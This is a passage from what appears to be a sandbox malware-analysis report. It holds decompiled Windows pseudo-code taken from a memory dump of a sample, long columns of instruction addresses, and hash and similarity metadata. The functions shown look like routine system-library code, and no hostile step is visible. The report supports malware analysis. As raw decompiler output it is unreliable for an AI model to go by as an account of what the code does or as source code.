							_t378 = _t452 + 0x9c;
							_t453 =  *_t378;
							goto L65;
						}
					}
					_t393 = E018A433B(__edx, __ecx, __ecx, _t453, __eflags);
					__eflags = _t393;
					if(_t393 != 0) {
						goto L5;
					} else {
						_v12 = 0xc000000d;
						goto L193;
					}
				} else {
					_t453 =  *0x18d5724; // 0x0
					 *0x18db1e0(__ecx, __edx);
					_t265 =  *_t453();
					L201:
					return E0182B640(_t265, _t395, _v8 ^ _t455, _t441, _t452, _t453);
				}
			}





















































































                                                        0x0188eb97
                                                        0x0188eb99
                                                        0x0188eb9f
                                                        0x0188eba1
                                                        0x0188ebaa
                                                        0x0188ebc3
                                                        0x0188ebcd
                                                        0x0188ebd5
                                                        0x0188ebd7
                                                        0x0188ebf0
                                                        0x0188ebf0
                                                        0x0188ebf4
                                                        0x0188ebf6
                                                        0x0188ebf9
                                                        0x0188ebfb
                                                        0x0188ec04
                                                        0x0188ec08
                                                        0x0188ec0e
                                                        0x00000000
                                                        0x00000000
                                                        0x0188ec16
                                                        0x0188ec16
                                                        0x0188ec19
                                                        0x0188ec3a
                                                        0x0188ec3a
                                                        0x0188ec3e
                                                        0x0188ec4d
                                                        0x0188ec50
                                                        0x0188ec52
                                                        0x0188ec58
                                                        0x0188ec5a
                                                        0x0188ec5d
                                                        0x0188ec5f
                                                        0x0188ec5f
                                                        0x0188ec64
                                                        0x0188ec68
                                                        0x0188ec73
                                                        0x0188ec73
                                                        0x0188ec7e
                                                        0x0188ec7f
                                                        0x0188ec81
                                                        0x0188ec8b
                                                        0x0188ec91
                                                        0x00000000
                                                        0x00000000
                                                        0x0188ec97
                                                        0x00000000
                                                        0x0188ec97
                                                        0x0188ec83
                                                        0x00000000
                                                        0x0188ec6a
                                                        0x0188ec6a
                                                        0x0188ec6d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0188ec6d
                                                        0x0188ec68
                                                        0x0188ec40
                                                        0x0188ec43
                                                        0x00000000
                                                        0x00000000
                                                        0x0188ec45
                                                        0x00000000
                                                        0x0188ec1b
                                                        0x0188ec1b
                                                        0x0188ec22
                                                        0x0188ec2c
                                                        0x0188ec2c
                                                        0x0188ec24
                                                        0x0188ec24
                                                        0x0188ec24
                                                        0x0188ec2e
                                                        0x0188ec30
                                                        0x00000000
                                                        0x0188ec36
                                                        0x0188ec36
                                                        0x00000000
                                                        0x0188ec36
                                                        0x0188ec30
                                                        0x0188ebfd
                                                        0x0188ebfd
                                                        0x0188edd2
                                                        0x0188edd2
                                                        0x0188edd4
                                                        0x0188edd6
                                                        0x0188edf0
                                                        0x0188edf6
                                                        0x0188ee00
                                                        0x0188ee00
                                                        0x0188edf8
                                                        0x0188edf8
                                                        0x0188edf8
                                                        0x0188ee02
                                                        0x0188ee04
                                                        0x0188ef6c
                                                        0x0188ef71
                                                        0x00000000
                                                        0x0188ee0a
                                                        0x0188ee0a
                                                        0x0188ee0c
                                                        0x0188ee0f
                                                        0x0188ee20
                                                        0x0188ee11
                                                        0x0188ee11
                                                        0x0188ee13
                                                        0x0188ee16
                                                        0x0188ee18
                                                        0x0188ee18
                                                        0x0188ee18
                                                        0x0188ee1b
                                                        0x0188ee1b
                                                        0x0188ee29
                                                        0x0188ee2c
                                                        0x0188ee30
                                                        0x0188ee3d
                                                        0x0188ee43
                                                        0x0188ee46
                                                        0x0188ee49
                                                        0x0188ee4c
                                                        0x0188ee4e
                                                        0x0188ee4e
                                                        0x0188ee53
                                                        0x0188ee53
                                                        0x0188ee65
                                                        0x0188ee6b
                                                        0x0188ee90
                                                        0x0188ee90
                                                        0x0188ee92
                                                        0x0188f23e
                                                        0x0188f23e
                                                        0x0188f243
                                                        0x0188f245
                                                        0x0188f257
                                                        0x0188f247
                                                        0x0188f250
                                                        0x0188f250
                                                        0x0188f25c
                                                        0x0188f25f
                                                        0x0188f261
                                                        0x0188f267
                                                        0x0188f26e
                                                        0x0188f270
                                                        0x0188f277
                                                        0x0188f27b
                                                        0x0188f27b
                                                        0x0188f277
                                                        0x0188f26e
                                                        0x0188f280
                                                        0x00000000
                                                        0x0188f280
                                                        0x0188ee98
                                                        0x0188ee9b
                                                        0x0188ee9d
                                                        0x0188eeaa
                                                        0x0188eeac
                                                        0x0188eeb4
                                                        0x0188eeb6
                                                        0x0188eeb9
                                                        0x0188eec0
                                                        0x0188eec1
                                                        0x0188eec5
                                                        0x0188eecb
                                                        0x0188eed5
                                                        0x0188eed5
                                                        0x0188eecd
                                                        0x0188eecd
                                                        0x0188eecd
                                                        0x0188eed7
                                                        0x0188eed9
                                                        0x0188ef00
                                                        0x0188ef09
                                                        0x0188ef0c
                                                        0x0188ef0e
                                                        0x0188f1f7
                                                        0x0188f1f9
                                                        0x0188f1fd
                                                        0x0188f20e
                                                        0x0188f1ff
                                                        0x0188f1ff
                                                        0x0188f201
                                                        0x0188f204
                                                        0x0188f206
                                                        0x0188f206
                                                        0x0188f206
                                                        0x0188f209
                                                        0x0188f209
                                                        0x0188f21b
                                                        0x0188f221
                                                        0x0188f226
                                                        0x0188f22a
                                                        0x0188f22e
                                                        0x00000000
                                                        0x0188f22e
                                                        0x0188ef14
                                                        0x0188ef17
                                                        0x0188ef19
                                                        0x0188ef26
                                                        0x0188ef28
                                                        0x0188ef30
                                                        0x0188ef32
                                                        0x0188ef35
                                                        0x0188ef37
                                                        0x0188ef3a
                                                        0x0188ef3d
                                                        0x0188f0ea
                                                        0x0188f0ee
                                                        0x0188f0ff
                                                        0x0188f0f0
                                                        0x0188f0f0
                                                        0x0188f0f2
                                                        0x0188f0f5
                                                        0x0188f0f7
                                                        0x0188f0f7
                                                        0x0188f0f7
                                                        0x0188f0fa
                                                        0x0188f0fa
                                                        0x0188f10a
                                                        0x0188f10e
                                                        0x0188f113
                                                        0x0188f116
                                                        0x0188f11a
                                                        0x0188f11e
                                                        0x0188f133
                                                        0x0188f120
                                                        0x0188f120
                                                        0x0188f122
                                                        0x0188f125
                                                        0x0188f127
                                                        0x0188f127
                                                        0x0188f127
                                                        0x0188f12a
                                                        0x0188f12d
                                                        0x0188f12d
                                                        0x0188f136
                                                        0x0188f139
                                                        0x0188f13c
                                                        0x0188f13e
                                                        0x0188f140
                                                        0x0188f140
                                                        0x0188f143
                                                        0x0188f146
                                                        0x0188f146
                                                        0x0188f14a
                                                        0x0188f15f
                                                        0x0188f162
                                                        0x0188f14c
                                                        0x0188f14c
                                                        0x0188f14e
                                                        0x0188f151
                                                        0x0188f153
                                                        0x0188f153
                                                        0x0188f153
                                                        0x0188f156
                                                        0x0188f15a
                                                        0x0188f15a
                                                        0x0188f165
                                                        0x0188f167
                                                        0x0188f1a9
                                                        0x0188f1af
                                                        0x0188f1b2
                                                        0x0188f1b9
                                                        0x0188f1bf
                                                        0x0188f1bb
                                                        0x0188f1bb
                                                        0x0188f1bb
                                                        0x0188f1c3
                                                        0x0188f169
                                                        0x0188f169
                                                        0x0188f16d
                                                        0x0188f175
                                                        0x0188f17b
                                                        0x0188f17f
                                                        0x0188f186
                                                        0x0188f18d
                                                        0x0188f193
                                                        0x0188f18f
                                                        0x0188f18f
                                                        0x0188f18f
                                                        0x0188f197
                                                        0x0188f19b
                                                        0x0188f1a4
                                                        0x0188f1a4
                                                        0x0188f1c7
                                                        0x0188f1cb
                                                        0x0188f1e0
                                                        0x0188f1e3
                                                        0x0188f1cd
                                                        0x0188f1cd
                                                        0x0188f1cf
                                                        0x0188f1d2
                                                        0x0188f1d4
                                                        0x0188f1d4
                                                        0x0188f1d4
                                                        0x0188f1d7
                                                        0x0188f1db
                                                        0x0188f1db
                                                        0x0188f1ee
                                                        0x00000000
                                                        0x0188f1ee
                                                        0x0188ef43
                                                        0x0188ef46
                                                        0x0188f0d0
                                                        0x0188f0d5
                                                        0x0188f0da
                                                        0x0188f0de
                                                        0x0188f0e1
                                                        0x00000000
                                                        0x0188f0e1
                                                        0x0188ef4c
                                                        0x0188ef4f
                                                        0x0188ef7b
                                                        0x0188ef7e
                                                        0x0188ef80
                                                        0x0188ef96
                                                        0x0188ef82
                                                        0x0188ef82
                                                        0x0188ef84
                                                        0x0188ef87
                                                        0x0188ef89
                                                        0x0188ef8b
                                                        0x0188ef8b
                                                        0x0188ef8b
                                                        0x0188ef8e
                                                        0x0188ef91
                                                        0x0188ef91
                                                        0x0188ef99
                                                        0x0188ef9c
                                                        0x0188ef9f
                                                        0x0188efad
                                                        0x0188efb0
                                                        0x0188efc3
                                                        0x0188efc5
                                                        0x0188efcf
                                                        0x0188efd1
                                                        0x0188effa
                                                        0x0188effc
                                                        0x0188f00d
                                                        0x0188effe
                                                        0x0188effe
                                                        0x0188f000
                                                        0x0188f003
                                                        0x0188f005
                                                        0x0188f005
                                                        0x0188f005
                                                        0x0188f008
                                                        0x0188f008
                                                        0x0188efd3
                                                        0x0188efe0
                                                        0x0188efe2
                                                        0x0188efe5
                                                        0x0188eff0
                                                        0x0188eff0
                                                        0x0188eff2
                                                        0x0188efe7
                                                        0x0188efe7
                                                        0x0188efe7
                                                        0x0188eff4
                                                        0x0188eff4
                                                        0x0188f016
                                                        0x0188efc7
                                                        0x0188efca
                                                        0x0188efca
                                                        0x0188efb2
                                                        0x0188efb8
                                                        0x0188efb8
                                                        0x0188efa1
                                                        0x0188efa9
                                                        0x0188efa9
                                                        0x0188f025
                                                        0x0188f02b
                                                        0x0188f031
                                                        0x0188f035
                                                        0x0188f038
                                                        0x0188f03b
                                                        0x0188f049
                                                        0x0188f04c
                                                        0x0188f05f
                                                        0x0188f061
                                                        0x0188f06b
                                                        0x0188f06d
                                                        0x0188f096
                                                        0x0188f09a
                                                        0x0188f0ab
                                                        0x0188f09c
                                                        0x0188f09c
                                                        0x0188f09e
                                                        0x0188f0a1
                                                        0x0188f0a3
                                                        0x0188f0a3
                                                        0x0188f0a3
                                                        0x0188f0a6
                                                        0x0188f0a6
                                                        0x0188f06f
                                                        0x0188f07c
                                                        0x0188f07e
                                                        0x0188f081
                                                        0x0188f08c
                                                        0x0188f08c
                                                        0x0188f08e
                                                        0x0188f083
                                                        0x0188f083
                                                        0x0188f083
                                                        0x0188f090
                                                        0x0188f090
                                                        0x0188f0b4
                                                        0x0188f063
                                                        0x0188f066
                                                        0x0188f066
                                                        0x0188f04e
                                                        0x0188f054
                                                        0x0188f054
                                                        0x0188f03d
                                                        0x0188f045
                                                        0x0188f045
                                                        0x0188f0b8
                                                        0x0188f0be
                                                        0x0188f0bf
                                                        0x0188f0c2
                                                        0x0188f0c4
                                                        0x0188f0c6
                                                        0x0188f0c6
                                                        0x0188f0c9
                                                        0x00000000
                                                        0x0188f0c9
                                                        0x0188ef54
                                                        0x00000000
                                                        0x0188ef54
                                                        0x0188ef2a
                                                        0x0188ef21
                                                        0x0188ef21
                                                        0x00000000
                                                        0x0188ef21
                                                        0x0188ef1e
                                                        0x0188ef1e
                                                        0x00000000
                                                        0x0188eedb
                                                        0x0188eedc
                                                        0x0188eede
                                                        0x0188eee0
                                                        0x0188eee5
                                                        0x0188eee7
                                                        0x0188eeff
                                                        0x00000000
                                                        0x0188eeff
                                                        0x0188eeee
                                                        0x0188eef2
                                                        0x00000000
                                                        0x00000000
                                                        0x0188eca2
                                                        0x0188eca4
                                                        0x0188eca5
                                                        0x0188eca5
                                                        0x0188ecab
                                                        0x0188ecb5
                                                        0x0188ecb5
                                                        0x0188ecad
                                                        0x0188ecad
                                                        0x0188ecad
                                                        0x0188ecb7
                                                        0x0188ecb9
                                                        0x0188ecd8
                                                        0x0188ecd8
                                                        0x0188ecdc
                                                        0x0188ecde
                                                        0x0188ed59
                                                        0x0188ed5c
                                                        0x0188ed60
                                                        0x0188ed71
                                                        0x0188ed62
                                                        0x0188ed62
                                                        0x0188ed64
                                                        0x0188ed67
                                                        0x0188ed69
                                                        0x0188ed69
                                                        0x0188ed69
                                                        0x0188ed6c
                                                        0x0188ed6c
                                                        0x0188ed74
                                                        0x0188ed77
                                                        0x0188ed79
                                                        0x0188ed93
                                                        0x0188ed7b
                                                        0x0188ed8b
                                                        0x0188ed8b
                                                        0x0188ed95
                                                        0x0188ed97
                                                        0x0188f237
                                                        0x0188f237
                                                        0x00000000
                                                        0x0188ed9d
                                                        0x0188ed9d
                                                        0x0188eda1
                                                        0x0188ee8a
                                                        0x0188ee8d
                                                        0x0188ee8d
                                                        0x00000000
                                                        0x0188ee8d
                                                        0x0188eda7
                                                        0x0188edaf
                                                        0x0188edb2
                                                        0x0188ee73
                                                        0x0188ee78
                                                        0x0188ee7c
                                                        0x0188ee7e
                                                        0x0188ee81
                                                        0x00000000
                                                        0x0188ee81
                                                        0x0188edb8
                                                        0x0188edc1
                                                        0x0188edc3
                                                        0x0188edcd
                                                        0x0188edcf
                                                        0x0188edd0
                                                        0x0188edd0
                                                        0x0188edd0
                                                        0x00000000
                                                        0x0188edd0
                                                        0x0188edc7
                                                        0x0188edca
                                                        0x00000000
                                                        0x0188edca
                                                        0x0188ed97
                                                        0x0188ece0
                                                        0x0188ece3
                                                        0x0188ece7
                                                        0x0188ecf0
                                                        0x0188ecf0
                                                        0x0188ecf0
                                                        0x0188ecf5
                                                        0x0188ecf8
                                                        0x0188ed08
                                                        0x0188ed0b
                                                        0x0188ed0d
                                                        0x0188ed2a
                                                        0x0188ed0f
                                                        0x0188ed1d
                                                        0x0188ed1f
                                                        0x0188ed22
                                                        0x0188ed22
                                                        0x0188ed2c
                                                        0x0188ed2e
                                                        0x00000000
                                                        0x0188ed34
                                                        0x0188ed34
                                                        0x0188ed37
                                                        0x00000000
                                                        0x00000000
                                                        0x0188ed39
                                                        0x0188ed3d
                                                        0x0188ed4e
                                                        0x0188ed3f
                                                        0x0188ed3f
                                                        0x0188ed41
                                                        0x0188ed44
                                                        0x0188ed46
                                                        0x0188ed46
                                                        0x0188ed46
                                                        0x0188ed49
                                                        0x0188ed49
                                                        0x0188ed51
                                                        0x00000000
                                                        0x0188ed51
                                                        0x0188ecfa
                                                        0x0188ecfa
                                                        0x0188ecfd
                                                        0x0188ede0
                                                        0x0188ede0
                                                        0x0188ede2
                                                        0x0188ef5d
                                                        0x00000000
                                                        0x0188ef5d
                                                        0x0188ede8
                                                        0x00000000
                                                        0x0188ede8
                                                        0x0188ecbb
                                                        0x0188ecbc
                                                        0x0188ecc0
                                                        0x0188ecc5
                                                        0x0188ecc7
                                                        0x00000000
                                                        0x00000000
                                                        0x0188ecce
                                                        0x0188ecd2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0188ecd2
                                                        0x0188ecb9
                                                        0x0188eed9
                                                        0x0188eeae
                                                        0x0188eea5
                                                        0x0188eea5
                                                        0x00000000
                                                        0x0188eea5
                                                        0x0188eea2
                                                        0x0188eea2
                                                        0x00000000
                                                        0x0188eea2
                                                        0x0188ee04
                                                        0x0188edd8
                                                        0x0188edde
                                                        0x00000000
                                                        0x0188edde
                                                        0x0188ebfb
                                                        0x0188ebdb
                                                        0x0188ebe0
                                                        0x0188ebe2
                                                        0x00000000
                                                        0x0188ebe4
                                                        0x0188ebe4
                                                        0x00000000
                                                        0x0188ebe4
                                                        0x0188ebac
                                                        0x0188ebac
                                                        0x0188ebb6
                                                        0x0188ebbc
                                                        0x0188f283
                                                        0x0188f293
                                                        0x0188f293

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: d3e442fcfb224a7512f3702d69e331446fbe010e6430369b2960c33f0ae5411c
                                                        • Instruction ID: 5709cfcffe15838f3278f2c8b09ab9571c3f2f6364ea973b77c7a786a8b19406
                                                        • Opcode Fuzzy Hash: d3e442fcfb224a7512f3702d69e331446fbe010e6430369b2960c33f0ae5411c
                                                        • Instruction Fuzzy Hash: 2532F474614655DBEB25EF2DC080372BBE1FF45304F08849AEA86CF286D735EA56CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0180B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E0180B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x18dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01807D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E018B8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01829E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0182B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0182CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01807D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E018B8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0182AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x18d8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x18d862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x18d8628; // 0x0
							_t116 =  *0x18d862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                        0x0180b94c
                                                        0x0180b956
                                                        0x0180b95c
                                                        0x0180b95e
                                                        0x0180b964
                                                        0x0180b969
                                                        0x0180b96d
                                                        0x0180b96d
                                                        0x0180b970
                                                        0x0180b974
                                                        0x0180b97a
                                                        0x0180badf
                                                        0x0180badf
                                                        0x0180bae2
                                                        0x0180bae4
                                                        0x0180bae6
                                                        0x0180baf0
                                                        0x01852cb8
                                                        0x0180baf6
                                                        0x0180baf6
                                                        0x0180baf6
                                                        0x0180bafd
                                                        0x0180bb1f
                                                        0x0180bb1f
                                                        0x0180baff
                                                        0x0180bb00
                                                        0x0180bb00
                                                        0x0180bb03
                                                        0x0180bb03
                                                        0x0180bacb
                                                        0x0180bacf
                                                        0x0180bad0
                                                        0x0180bad1
                                                        0x0180badc
                                                        0x0180badc
                                                        0x0180b980
                                                        0x0180b980
                                                        0x0180b988
                                                        0x0180b98b
                                                        0x0180b98d
                                                        0x0180b990
                                                        0x0180b993
                                                        0x0180b999
                                                        0x0180b99b
                                                        0x0180b9a1
                                                        0x0180b9a5
                                                        0x0180b9aa
                                                        0x0180b9b0
                                                        0x0180b9bb
                                                        0x0180b9c0
                                                        0x0180b9c3
                                                        0x0180b9ca
                                                        0x0180b9cc
                                                        0x0180b9cf
                                                        0x0180b9d3
                                                        0x0180b9d7
                                                        0x0180ba94
                                                        0x0180ba94
                                                        0x0180ba98
                                                        0x0180baa3
                                                        0x01852ccb
                                                        0x0180baa9
                                                        0x0180baa9
                                                        0x0180baa9
                                                        0x0180bab1
                                                        0x01852cd5
                                                        0x01852cdd
                                                        0x01852cdd
                                                        0x0180babb
                                                        0x0180babc
                                                        0x0180bac2
                                                        0x0180bac3
                                                        0x0180bac3
                                                        0x0180bac6
                                                        0x00000000
                                                        0x0180b9dd
                                                        0x0180b9dd
                                                        0x0180b9e7
                                                        0x0180b9e7
                                                        0x0180b9ec
                                                        0x0180b9ec
                                                        0x0180b9f1
                                                        0x0180b9f5
                                                        0x0180b9fa
                                                        0x0180ba00
                                                        0x0180ba0c
                                                        0x0180ba10
                                                        0x0180ba10
                                                        0x0180ba12
                                                        0x0180ba18
                                                        0x00000000
                                                        0x00000000
                                                        0x0180bb26
                                                        0x0180bb26
                                                        0x0180ba1e
                                                        0x0180ba1e
                                                        0x0180ba23
                                                        0x0180ba25
                                                        0x0180ba2c
                                                        0x0180ba30
                                                        0x0180ba35
                                                        0x0180ba35
                                                        0x0180ba41
                                                        0x0180ba46
                                                        0x0180ba4c
                                                        0x0180ba50
                                                        0x0180ba54
                                                        0x0180ba6a
                                                        0x0180ba6e
                                                        0x0180ba70
                                                        0x0180ba74
                                                        0x0180ba78
                                                        0x0180ba7a
                                                        0x0180ba7c
                                                        0x0180ba8e
                                                        0x0180ba90
                                                        0x0180ba92
                                                        0x0180bb14
                                                        0x0180bb14
                                                        0x0180bb16
                                                        0x0180bb16
                                                        0x00000000
                                                        0x0180ba7c
                                                        0x0180bb0a
                                                        0x0180bb0d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0180bb0f

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0180B9A5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 885266447-0
                                                        • Opcode ID: e82c2b877d1c636917b791de2707b27a761a36610fc252c256a41690deffef33
                                                        • Instruction ID: 03efc727d04b57f63af43a326c084c3a39d28b7dd02048c3b6e1f4c2bd4ae0eb
                                                        • Opcode Fuzzy Hash: e82c2b877d1c636917b791de2707b27a761a36610fc252c256a41690deffef33
                                                        • Instruction Fuzzy Hash: 68516A75609349CFC762CF6CC88092ABBE5FB88714F14496EE995C7385D730EA40CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01812581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E01812581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t238;
				signed int _t242;
				void* _t243;
				signed int _t248;
				signed int _t250;
				intOrPtr _t252;
				signed int _t255;
				signed int _t262;
				signed int _t265;
				signed int _t273;
				signed int _t279;
				signed int _t281;
				void* _t283;
				void* _t284;
				signed int _t285;
				unsigned int _t288;
				signed int _t292;
				signed int* _t293;
				signed int _t294;
				signed int _t298;
				intOrPtr _t310;
				signed int _t319;
				signed int _t321;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t331;
				signed int _t332;
				signed int _t334;
				signed int _t336;
				void* _t337;
				signed int _t339;

				_t334 = _t336;
				_t337 = _t336 - 0x4c;
				_v8 =  *0x18dd360 ^ _t334;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t326 = 0x18db2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t288 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t279 = 0x48;
				_t308 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t319 = 0;
				_v37 = _t308;
				if(_v48 <= 0) {
					L16:
					_t45 = _t279 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t327 = 0xc0000106;
						goto L32;
					} else {
						_t326 = E01804620(_t288,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
						_v52 = _t326;
						__eflags = _t326;
						if(_t326 == 0) {
							_t327 = 0xc0000017;
							goto L32;
						} else {
							 *(_t326 + 0x44) =  *(_t326 + 0x44) & 0x00000000;
							_t50 = _t326 + 0x48; // 0x48
							_t321 = _t50;
							_t308 = _v32;
							 *(_t326 + 0x3c) = _t279;
							_t281 = 0;
							 *((short*)(_t326 + 0x30)) = _v48;
							__eflags = _t308;
							if(_t308 != 0) {
								 *(_t326 + 0x18) = _t321;
								__eflags = _t308 - 0x18d8478;
								 *_t326 = ((0 | _t308 == 0x018d8478) - 0x00000001 & 0xfffffffb) + 7;
								E0182F3E0(_t321,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
								_t308 = _v32;
								_t337 = _t337 + 0xc;
								_t281 = 1;
								__eflags = _a8;
								_t321 = _t321 + (( *_t308 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t273 = E018739F2(_t321);
									_t308 = _v32;
									_t321 = _t273;
								}
							}
							_t292 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t327 = _v68;
								__eflags = 0;
								 *((short*)(_t321 - 2)) = 0;
								goto L32;
							} else {
								_t279 = _t326 + _t281 * 4;
								_v56 = _t279;
								do {
									__eflags = _t308;
									if(_t308 != 0) {
										_t238 =  *(_v60 + _t292 * 4);
										__eflags = _t238;
										if(_t238 == 0) {
											goto L30;
										} else {
											__eflags = _t238 == 5;
											if(_t238 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t279 =  *(_v60 + _t292 * 4);
										 *(_t279 + 0x18) = _t321;
										_t242 =  *(_v60 + _t292 * 4);
										__eflags = _t242 - 8;
										if(_t242 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t242 * 4 +  &M01812959))) {
												case 0:
													__ax =  *0x18d8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0182F3E0(__edi,  *0x18d848c, __ax & 0x0000ffff);
														__eax =  *0x18d8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0182F3E0(_t321, _v80, _v64);
													_t268 = _v64;
													goto L26;
												case 2:
